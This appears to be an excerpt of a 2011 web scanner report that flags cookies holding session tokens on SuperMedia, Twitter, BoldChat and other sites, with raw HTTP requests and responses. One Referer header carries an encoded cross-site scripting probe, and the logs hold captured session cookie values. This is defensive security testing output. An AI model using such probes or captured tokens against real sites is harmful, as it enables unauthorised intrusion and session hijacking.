GET /results.cfm HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:36:04 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A03%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:04 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:04 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:04 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /rss.cfm HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:36:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A22%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:23 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:23 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:23 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /search.cfm HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:36:23 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A23%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:23 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:23 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:23 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /sec.cfm HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:36:01 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A01%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:01 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:01 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:01 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /stockquote.cfm HTTP/1.1 Host: ir.supermedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NOMOBILE=0; s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; s_sq=%5B%5BB%5D%5D; VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463; VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A11%3A57%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13; VERIZONINFO_PREVIEW=; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296762132|check#true#1296760332;
Response
HTTP/1.1 200 OK Connection: close Date: Thu, 03 Feb 2011 19:36:03 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Set-Cookie: VERIZONINFO_SESSION=1155779910%7C%20%7Bts%20%272011%2D02%2D03%2014%3A09%3A40%27%7D%7C%20%7Bts%20%272011%2D02%2D03%2014%3A36%3A02%27%7D%7CF09AE369AE90CCCA773E05999F0B8C13;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:03 GMT;path=/ Set-Cookie: VERIZONINFO_BRIEFCASE=UPDATED%7C40487%2E5900463;domain=ir.supermedia.com;expires=Fri, 03-Feb-2012 19:36:03 GMT;path=/ Set-Cookie: VERIZONINFO_PREVIEW=;expires=Wed, 03-Feb-2010 19:36:03 GMT;path=/ Content-Type: text/html; charset=UTF-8
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /aid/3760177095415339810/bc.chat?cwdid=1954365562430760092&wdid=798708614246318013&rdid=1201083812220968228&vr=&vn=&vi=&ve=&vp=&iq=&curl= HTTP/1.1 Host: livechat.boldchat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Resin/2.1.17 Cache-Control: no-cache,no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml" Set-Cookie: bc-visitor-id=798708614246318013=948822557773872607; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 19:47:54 GMT Set-Cookie: bc-visit-id=798708614246318013=9223372036839677808; domain=.boldchat.com; path=/ Set-Cookie: JSESSIONID=a_SsnwztJaxd; path=/ Content-Type: text/html; charset=utf-8 Date: Thu, 03 Feb 2011 19:47:53 GMT Content-Length: 11752
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /aid/3760177095415339810/bc.chat HTTP/1.1 Host: livechat.boldchat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Resin/2.1.17 Cache-Control: no-cache,no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml" Set-Cookie: bc-visitor-id=3760177095415339810=7851714395809697412; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 20:32:21 GMT Set-Cookie: bc-visit-id=3760177095415339810=9223372036839688863; domain=.boldchat.com; path=/ Set-Cookie: JSESSIONID=aP-3JlTQvoC6; path=/ Content-Type: text/html; charset=utf-8 Date: Thu, 03 Feb 2011 20:32:21 GMT Content-Length: 101191
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET / HTTP/1.1 Host: mad4milk.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:48:05 GMT Server: Apache/2.0.54 X-Powered-By: PHP/5.2.14 Set-Cookie: ci_session=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2264dc0b4145e45d69276a4c3c70a5981e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A15%3A%22173.193.214.243%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Mozilla%2F4.0+%28compatible%3B+MSIE+7.0%3B+Windows+NT+6.0%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1296762487%3Bs%3A10%3A%22last_visit%22%3Bi%3A0%3B%7D; expires=Thu, 03-Feb-2011 21:48:07 GMT; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 2866
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /acdwsweb/ACDwsAction.do HTTP/1.1 Host: mktws.apple.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /CammsServlet?assetid=198 HTTP/1.1 Host: my.supermedia.com Proxy-Connection: keep-alive Referer: http://www.supermedia.com/social-responsibility/corporate-governance Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: campaign_track=BP%3AUpdate%20Your%20Profile%20Top; mbox=session#1296759528614-838261#1296763650|check#true#1296761850; s_cc=true; undefined_s=First%20Visit; s_sq=%5B%5BB%5D%5D
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /a/jobs/find-jobs/q-Honda+Research+Development+America/x22 HTTP/1.1 Host: nowhiringtoday.jobamatic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/lgpl-license.php HTTP/1.1 Host: opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /licenses/mit-license.php HTTP/1.1 Host: opensource.org Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ref/lppb.asp HTTP/1.1 Host: solutions.liveperson.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Connection: close Date: Thu, 03 Feb 2011 17:52:33 GMT Server: Microsoft-IIS/6.0 P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM" X-Powered-By: ASP.NET Location: pbl.asp Content-Length: 128 Content-Type: text/html Set-Cookie: visitor=ref=LP+Power+%2D+; expires=Sun, 10-Jan-2010 05:00:00 GMT; domain=.liveperson.com; path=/ Set-Cookie: ASPSESSIONIDQSDTDCQS=DJKOGOICKIGDBAFDJAHHMONP; path=/ Cache-control: private
<head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="pbl.asp">here</a>.</body>
The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /dispatch/?publisher=veoh&list-id=rbox-blended&format=json&id=366&list-size=12&uim=rbox-blended&intent=s&item-id=v18978294NGnK88j8&item-type=video&item-url=http%3A//www.veoh.com/browse/videos/category/action_adventure/watch/v18978294NGnK88j8&page-id=252bf48a1c3557304769eba4cb04a734b0b966bf&pv=2&cv=4-6-1-43135-1081071&uiv=default&uploader=bunny12344&v=35284&content-rating=0&external=http%3A//burp/show/11 HTTP/1.1 Host: trc.taboolasyndication.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 20:52:28 GMT Server: Jetty(6.1.7) P3P: policyref="http://trc.taboolasyndication.com/p3p.xml", CP="NOI DSP COR LAW NID CURa ADMa DEVa PSAa PSDa OUR BUS IND UNI COM NAV INT DEM" Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Type: text/plain; charset=utf-8 Set-Cookie: taboola_user_id=4c66d115-8de0-434d-9ff5-5470c9ca620e;Path=/;Expires=Fri, 03-Feb-12 20:52:28 GMT Set-Cookie: taboola_session_id_veoh=v1_34827fb6eada2a9b2f6ab3438324282f_4c66d115-8de0-434d-9ff5-5470c9ca620e_1296766348_1296766348;Path=/ Set-Cookie: JSESSIONID=.prod2-f2;Path=/ Set-Cookie: taboola_wv_veoh=4501877959146416130;Path=/;Expires=Fri, 03-Feb-12 20:52:28 GMT Set-Cookie: taboola_rii_veoh=7442879704085952417_1039225080754099931;Path=/;Expires=Fri, 03-Feb-12 20:52:28 GMT Vary: Accept-Encoding Connection: close Content-Length: 9148
guest_id=129676075859926793; path=/; expires=Sat, 05 Mar 2011 19:19:18 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /home HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 302 Found Date: Thu, 03 Feb 2011 19:19:18 GMT Server: hi Status: 302 Found Location: http://twitter.com/login?redirect_after_login=%2Fhome X-Runtime: 0.00233 Content-Type: text/html; charset=utf-8 Content-Length: 119 Cache-Control: no-cache, max-age=300 Set-Cookie: k=173.193.214.243.1296760758598311; path=/; expires=Thu, 10-Feb-11 19:19:18 GMT; domain=.twitter.com Set-Cookie: guest_id=129676075859926793; path=/; expires=Sat, 05 Mar 2011 19:19:18 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CToPY3JlYXRlZF9hdGwrCEnh9uwtAToOcmV0dXJuX3RvIhxodHRwOi8v%250AdHdpdHRlci5jb20vaG9tZToHaWQiJWY0NWVhYTM0NjI3NmM1ODJiYmEzMGZj%250AMjM3N2UyYjkzIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6%250ARmxhc2hIYXNoewAGOgpAdXNlZHsA--b39156638e0fd7387d15e0a4ebb19b4b1becdcf0; domain=.twitter.com; path=/ Expires: Thu, 03 Feb 2011 19:24:18 GMT X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<html><body>You are being <a href="http://twitter.com/login?redirect_after_login=%2Fhome">redirected</a>.</body></html>
guest_id=129676075327739820; path=/; expires=Sat, 05 Mar 2011 19:19:13 GMT
The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /supermedia HTTP/1.1 Host: twitter.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 200 OK Date: Thu, 03 Feb 2011 19:19:13 GMT Server: hi Status: 200 OK X-Transaction: 1296760753-13380-14514 ETag: "980457e03ec8c8ddfb67fd40ecd97bea" Last-Modified: Thu, 03 Feb 2011 19:19:13 GMT X-Runtime: 0.01072 Content-Type: text/html; charset=utf-8 Content-Length: 50851 Pragma: no-cache X-Revision: DEV Expires: Tue, 31 Mar 1981 05:00:00 GMT Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0 Set-Cookie: k=173.193.214.243.1296760753269662; path=/; expires=Thu, 10-Feb-11 19:19:13 GMT; domain=.twitter.com Set-Cookie: guest_id=129676075327739820; path=/; expires=Sat, 05 Mar 2011 19:19:13 GMT Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCH%252FM9uwtAToHaWQiJTRmZjcyZDZjOTYwYzFj%250ANDkxYTkzZDhhNmVhN2Q2OGNhIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--100f876db5da30de78a91b22d9b5e99bb4d21a14; domain=.twitter.com; path=/ X-XSS-Protection: 1; mode=block X-Frame-Options: SAMEORIGIN Vary: Accept-Encoding Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <meta htt ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /12948/watch-robo-telugu-movie-online/x22 HTTP/1.1 Host: videos.smartdesis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:32:37 GMT Server: Apache X-Powered-By: PHP/5.2.8 Vary: Cookie X-Pingback: http://videos.smartdesis.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=1190ec8918d40851363fa60d5b1876bc; path=/ Last-Modified: Thu, 03 Feb 2011 20:32:37 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 395
<div id="content">
<div class="post"> <h2>Error 404 - Not Found</h2>
<div class="entry"> <p>Sorry, the page that you are looking for does not exist.</p> </div><!--/entr ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /12962/watch-mahesh-khaleja-movie-online-tc-rip/x22 HTTP/1.1 Host: videos.smartdesis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:32:42 GMT Server: Apache X-Powered-By: PHP/5.2.8 Vary: Cookie X-Pingback: http://videos.smartdesis.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=f70cf1b1d146bbdac6f6e4323000a5a0; path=/ Last-Modified: Thu, 03 Feb 2011 20:32:43 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 395
<div id="content">
<div class="post"> <h2>Error 404 - Not Found</h2>
<div class="entry"> <p>Sorry, the page that you are looking for does not exist.</p> </div><!--/entr ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /13039/watch-ntrs-brindavanam-movie-online-tc-rip/x22 HTTP/1.1 Host: videos.smartdesis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:32:38 GMT Server: Apache X-Powered-By: PHP/5.2.8 Vary: Cookie X-Pingback: http://videos.smartdesis.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=c8a61672d2ee972f173196ceee739cc4; path=/ Last-Modified: Thu, 03 Feb 2011 20:32:40 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 395
<div id="content">
<div class="post"> <h2>Error 404 - Not Found</h2>
<div class="entry"> <p>Sorry, the page that you are looking for does not exist.</p> </div><!--/entr ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /13201/watch-rakht-charitra-2-movie-online/x22 HTTP/1.1 Host: videos.smartdesis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:32:37 GMT Server: Apache X-Powered-By: PHP/5.2.8 Vary: Cookie X-Pingback: http://videos.smartdesis.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=ea0ddc1f107ac0ebee15071a4b6732b0; path=/ Last-Modified: Thu, 03 Feb 2011 20:32:37 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 395
<div id="content">
<div class="post"> <h2>Error 404 - Not Found</h2>
<div class="entry"> <p>Sorry, the page that you are looking for does not exist.</p> </div><!--/entr ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hindi-online-movies-index/x22 HTTP/1.1 Host: videos.smartdesis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:32:35 GMT Server: Apache X-Powered-By: PHP/5.2.8 Vary: Cookie X-Pingback: http://videos.smartdesis.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=7456e574e55fb97ae5eb9ad3caf48919; path=/ Last-Modified: Thu, 03 Feb 2011 20:32:36 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 395
<div id="content">
<div class="post"> <h2>Error 404 - Not Found</h2>
<div class="entry"> <p>Sorry, the page that you are looking for does not exist.</p> </div><!--/entr ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /page/2/x22 HTTP/1.1 Host: videos.smartdesis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:32:46 GMT Server: Apache X-Powered-By: PHP/5.2.8 Vary: Cookie X-Pingback: http://videos.smartdesis.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=4a22e9dc4b28418100a379012fe5689e; path=/ Last-Modified: Thu, 03 Feb 2011 20:32:46 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 395
<div id="content">
<div class="post"> <h2>Error 404 - Not Found</h2>
<div class="entry"> <p>Sorry, the page that you are looking for does not exist.</p> </div><!--/entr ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /tamil-online-movies-index/x22 HTTP/1.1 Host: videos.smartdesis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:32:46 GMT Server: Apache X-Powered-By: PHP/5.2.8 Vary: Cookie X-Pingback: http://videos.smartdesis.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=080d4866fbd5b5816cc5bbde5d18c081; path=/ Last-Modified: Thu, 03 Feb 2011 20:32:46 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 395
<div id="content">
<div class="post"> <h2>Error 404 - Not Found</h2>
<div class="entry"> <p>Sorry, the page that you are looking for does not exist.</p> </div><!--/entr ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /telugu-online-movies-index-a/x22 HTTP/1.1 Host: videos.smartdesis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 20:32:35 GMT Server: Apache X-Powered-By: PHP/5.2.8 Vary: Cookie X-Pingback: http://videos.smartdesis.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: PHPSESSID=4c1e6e6a8f7ca1c6adde18d7254993a5; path=/ Last-Modified: Thu, 03 Feb 2011 20:32:36 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 395
<div id="content">
<div class="post"> <h2>Error 404 - Not Found</h2>
<div class="entry"> <p>Sorry, the page that you are looking for does not exist.</p> </div><!--/entr ...[SNIP]...
The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /x22 HTTP/1.1 Host: videos.smartdesis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
